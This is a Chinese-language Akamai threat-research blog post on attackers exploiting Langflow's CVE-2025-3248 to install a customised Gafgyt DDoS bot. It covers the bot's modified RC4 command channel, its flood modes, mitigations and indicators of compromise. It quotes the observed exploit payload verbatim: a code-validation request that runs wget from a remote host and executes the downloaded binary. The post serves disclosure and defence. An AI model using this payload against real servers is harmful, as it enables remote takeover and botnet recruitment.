Akamai 收购 LayerX,为所有浏览器提供端到端安全和实时 AI 使用控制。 获取详情

恶意利用 Langflow 构建定制化 DDoS Gafgyt 僵尸网络

Larry Cashdollar

Jul 14, 2026

Larry Cashdollar

Larry Cashdollar 从事安全领域漏洞研究工作已有 20 多年,目前是 Akamai 安全情报响应团队的首席安全研究员。他曾在南缅因大学学习计算机科学专业。Larry 记录了 300 多个 CVE,曾在 BotConf、BSidesBoston、OWASP Rhode Island 和 DEF CON 等大会上介绍自己的研究成果。在闲暇时间,他喜欢户外运动和改装小型发动机。

分享

要点汇总

  • 攻击者正积极利用 Langflow 代码验证 API 端点中的一个远程代码执行 (RCE) 漏洞。Langflow 是一款用于构建 AI 和大语言模型 (LLM) 应用原型的热门可视化框架。

  • 一旦该框架失守,漏洞利用程序便会植入一个高度定制化的 Gafgyt 分布式拒绝服务 (DDoS) 爬虫程序变体。该特定载荷剥离了加密货币挖矿等次要功能,从而完全专注于网络流量横扫,并使用了一种复杂的改良版 RC4 流密码来隐藏其命令与控制 (C2) 通信,旨在绕过标准的自动化解码工具。

  • 由于企业 AI 研发迭代极快,团队往往频繁将 Langflow 等实验性工具部署在生产或测试网络中,却未能实施妥善的网络分段、防火墙防护或严格的出站流量过滤。这催生出了一个高度受信任的环境,导致恶意的出站 C2 流量能够轻易绕过企业级的过滤机制。

  • 筑牢 AI 基础架构的安全防线,必须回归基础的安全规范:修复 AI 编排平台中的任意代码执行缺陷、实施严格的出站流量过滤(例如阻断 1337 端口的越权流量)、通过 Web 应用程序防火墙 (WAF) 隔离开发环境,以及部署针对性的 YARA 签名。

过去几年,网络安全界始终在担忧高级 AI 威胁,例如自动化网络钓鱼、深度伪造以及自主恶意软件。然而,攻击者正用实际行动证明,他们的眼前目标要务实得多。他们不仅企图操纵 AI,更渴望劫持其底层基础架构,以此为传统的、海量化网络犯罪提供支持。

最新的威胁情报揭示了现代 AI 部署与经典僵尸网络架构之间一个极其罕见的交集:攻击者正积极利用 Langflow 中的 RCE 漏洞 CVE-2025-3248,以此来来植入老牌 Gafgyt/BASHLITE DDoS 爬虫程序的高度定制化变体。

在本博文中,我将详细介绍攻击者如何利用 CVE-2025-3248 漏洞,将前沿的 AI 框架转化为实施暴力攻击的网络武器。

初始突破口:CVE-2025-3248

Langflow Langflow 是一款备受开发者青睐的可视化框架,用于构建 AI 和 LLM 应用的原型并进行开发。由于此类应用天生需要具备测试和运行自定义逻辑的能力,因此其特定的端点本身就具备代码执行功能。

攻击者已利用这种能力反过来攻击该平台。在现网环境中,我们观察到以下针对其代码验证 API 的恶意载荷:

{
  "code": "import os; os.system(\"wget -q -O /tmp/bot_x86_64 http://184.174.96.191:8088/bot.x86_64 && chmod +x /tmp/bot_x86_64 && /tmp/bot_x86_64\")"
}

漏洞剖析

  • 漏洞根源/api/v1/validate/code 端点接收不可信的 Python 脚本,并在未实施妥善沙盒隔离的情况下直接在主机系统上执行。

  • 投递机制:被注入的代码利用标准 Python 库函数 (os.system) 来调用 wget

  • 凭据检索:程序从远程暂存服务器 (184.174.96.191:8088) 静默下载一个 x86_64 架构的 Linux 可执行文件,将其标记为可执行文件 (chmod +x),并直接从临时 /tmp 目录下启动该文件。

分析:Gafgyt/BASHLITE 变体

一旦在被入侵的 AI 服务器上执行,植入的文件 (bot.x86_64) 就会变成专属的远程控制网络武器。尽管它源自经典的 Gafgyt 家族,但我们的静态和动态分析表明,这并非一个简单的、由脚本小子复制粘贴而来的恶意载荷。其开发者已将标准的 DDoS 功能封装在复杂的自定义加密机制之中。

执行与规避行为

启动后,该二进制文件会执行一系列操作,以隐藏自身存在并准备其内部引擎:

  • 特征指纹:它向标准输出打印了一段带有挑衅性的 ASCII 横幅:come at me krebs rimasuta go BRRT(影射了知名安全记者 Brian Krebs 以及攻击者代号 rimasuta)。

  • 守护程序:它会立即调用 clone() 来派生一个子进程,同时父进程则退出。随后,它关闭标准输入、输出和错误描述符 (stdio),并彻底脱离终端以在后台静默运行。

  • 纯粹的攻击性:该二进制文件包含任何加密货币挖矿程序具备任何持久化机制,也没有横向移动扫描功能。其执行路径完全针对单一任务进行了优化:网络泛洪攻击。

自定义密码与 C2 协议

该变体实现了一种高级、多阶段的改良版 RC4 流密码,用以保护其 C2 通信。其加密方案在以下三个关键维度上偏离了标准 RC4 规范,旨在破坏标准的自动化解码工具:

  1. 非标准 S 盒种子:该加密方案并未对 S 盒进行线性初始化,而是利用自定义的等差数列对其进行填充:$S[i] = (0x0D + i \times 0xA7) \pmod{256}$。

  2. 双阶段密钥调度算法 (KSA):它使用硬编码的 32 位密钥(如 0xDEADBEEF、0xCAFEBABE 等)来改变 S 盒,然后通过经典的 Borland 线性同余生成器 (LCG) 进行五次高强度重排。

  3. 改进版伪随机生成算法 (PRGA):通过引入移位循环计数器和位运算(ROLSHR),对生成的密钥流字节实施进一步的混淆。

攻击能力

该爬虫程序具有四条截然不同的执行路径,直接映射到 sendto 系统调用,分别对应四种经典的拒绝服务攻击媒介:

 

状态

攻击媒介

技术机制

0x01

UDP 泛洪攻击

触发原始 sendto 循环,发送海量 UDP 数据报

0x02

TCP 泛洪攻击

发起高频连接并进行大规模 SYN/ACK 报文轰炸

0x03

HOLD 泛洪攻击

针对 Web 服务器实施长连接资源耗尽攻击

0x04

Junk/STD 泛洪攻击

投递随机载荷的 UDP 泛洪,旨在耗尽目标系统的状态表

AI 基础架构面临的战略风险

我们很容易将 AI 应用视为与企业其他 IT 技术栈相隔离的独立环境,但在攻击者眼中,它们却是极其诱人的黄金资产。劫持 AI 服务器并将其强行并入僵尸网络,能为黑客带来诸多独特的资源优势:

  • 海量算力与高带宽:AI 工作负载几乎总是托管在高性能云实例或稳健的企业级服务器上。这些机器天生拥有庞大的网络带宽,这正是发起毁灭性 DDoS 攻击必不可少的条件。

  • “影子 IT”漏洞隐患:由于 AI 研发正以惊人的速度迭代,研发团队往往频繁在生产或测试环境中直接搭建 Langflow 等实验性平台,却未能实施妥善的网络分段、漏洞管理或防火墙防护。

  • 可信的网络环境:企业云基础架构通常享有更广泛的出站网络权限,这导致恶意的出站 C2 流量能够轻易绕过企业常规的出站过滤机制。

防御与缓解

如果您的团队正在使用 Langflow 或类似的业务可视化 AI 编排平台,强烈建议立即针对当前的安全态势调整防御策略。

  • 修补与升级:确保您的 Langflow 部署已更新至最新安全版本,以彻底根除代码验证 API 中存在的任意代码执行缺陷。

  • 实施严格的出站流量过滤:AI 模型训练和原型开发环境极少需要向任意公网 IP 地址发起毫无约束的出站 TCP 访问。请果断阻止通过 1337 等异常端口发起的出站连接。

  • 网络隔离:将 AI 开发环境视为不可信的网络。利用 WAF(Web 应用程序防火墙)将其与企业核心主环境实施严格的微隔离,并限制其对公共互联网的访问。

  • 部署 YARA 签名:针对系统二进制文件以及临时目录实施持续监控,全力捕捉该攻击者特有的加密 S 盒种子特征字节码:0d b4 5b 02 a9 50 f7 9e

结语

对 CVE-2025-3248 漏洞的恶意利用给我们敲响了警钟:安全态势并非只是渐进式演进,而是正在发生颠覆性的结构质变。当我们将 Langflow 等强大的 AI 框架快速集成到企业系统中时,我们必须避免盲目地将这些平台视为独立或特定的封闭环境。攻击者敏锐地察觉到了这些环境中所蕴藏的庞大算力和带宽,并正企图利用那些历经数十年检验、曾滋养了僵尸网络的老旧策略,将这些全新资产彻底变成自己的攻击武器。

保障 AI 基础架构的安全,要求我们必须回归最基础的安全规范:实施稳健的网络分段、严格的出站流量过滤,以及保持高度警惕的补丁管理。在竞相构建下一代 AI 应用的竞赛中,我们绝不能让那些阴魂不散的陈旧威胁卷土重来。

技术附录:IOC 与防御机制

文件和系统哈希值

  • SHA256: e00d92ca28a2cfd75e96f71fc0408747f04942657fcab0f2a25ce79bc3ad23a8

  • ELF 内部版本 ID (SHA1)523ae28b0833f9a68f4264d16c803ca5fdc771b9

网络迹象

  • C2 服务器 IP184.174.96.191

  • 恶意软件暂存端口8088/TCP(HTTP 下载)

  • C2 指令端口1337/TCP(加密流量)

主机签名

  • 通过 1337 端口向外部 IP 发起的出站连接

  • 在临时 /tmp 下运行且启动后立即关闭标准文件描述符的未知进程

  • 标准输出日志或内存字符串中包含 come at me krebs rimasuta go BRRT 字符串

 
Larry Cashdollar

Jul 14, 2026

Larry Cashdollar

Larry Cashdollar 从事安全领域漏洞研究工作已有 20 多年,目前是 Akamai 安全情报响应团队的首席安全研究员。他曾在南缅因大学学习计算机科学专业。Larry 记录了 300 多个 CVE,曾在 BotConf、BSidesBoston、OWASP Rhode Island 和 DEF CON 等大会上介绍自己的研究成果。在闲暇时间,他喜欢户外运动和改装小型发动机。

标签

分享

相关博文

安全研究
CVE-2026-48282:缓解 Adobe ColdFusion 中的高危漏洞
探究 Adobe ColdFusion 中的关键路径遍历漏洞 CVE-2026-48282。了解受影响的版本及关键补丁更新。
安全研究
MCP 新规来袭:安全团队备战指南
June 25, 2026
随着 MCP 演进至全新的无状态架构,安全责任正逐步转移到开发人员肩上。了解 Akamai 如何针对新版规范开展威胁建模,助您未雨绸缪。
研究
迷你沙虫:蠕虫归来,公开肆虐
了解 2026 年沙虫供应链攻击:探索 TeamPCP 如何在恶意载荷中利用持续集成 (CI) 缓存中毒技术和滥用 OIDC 认证机制。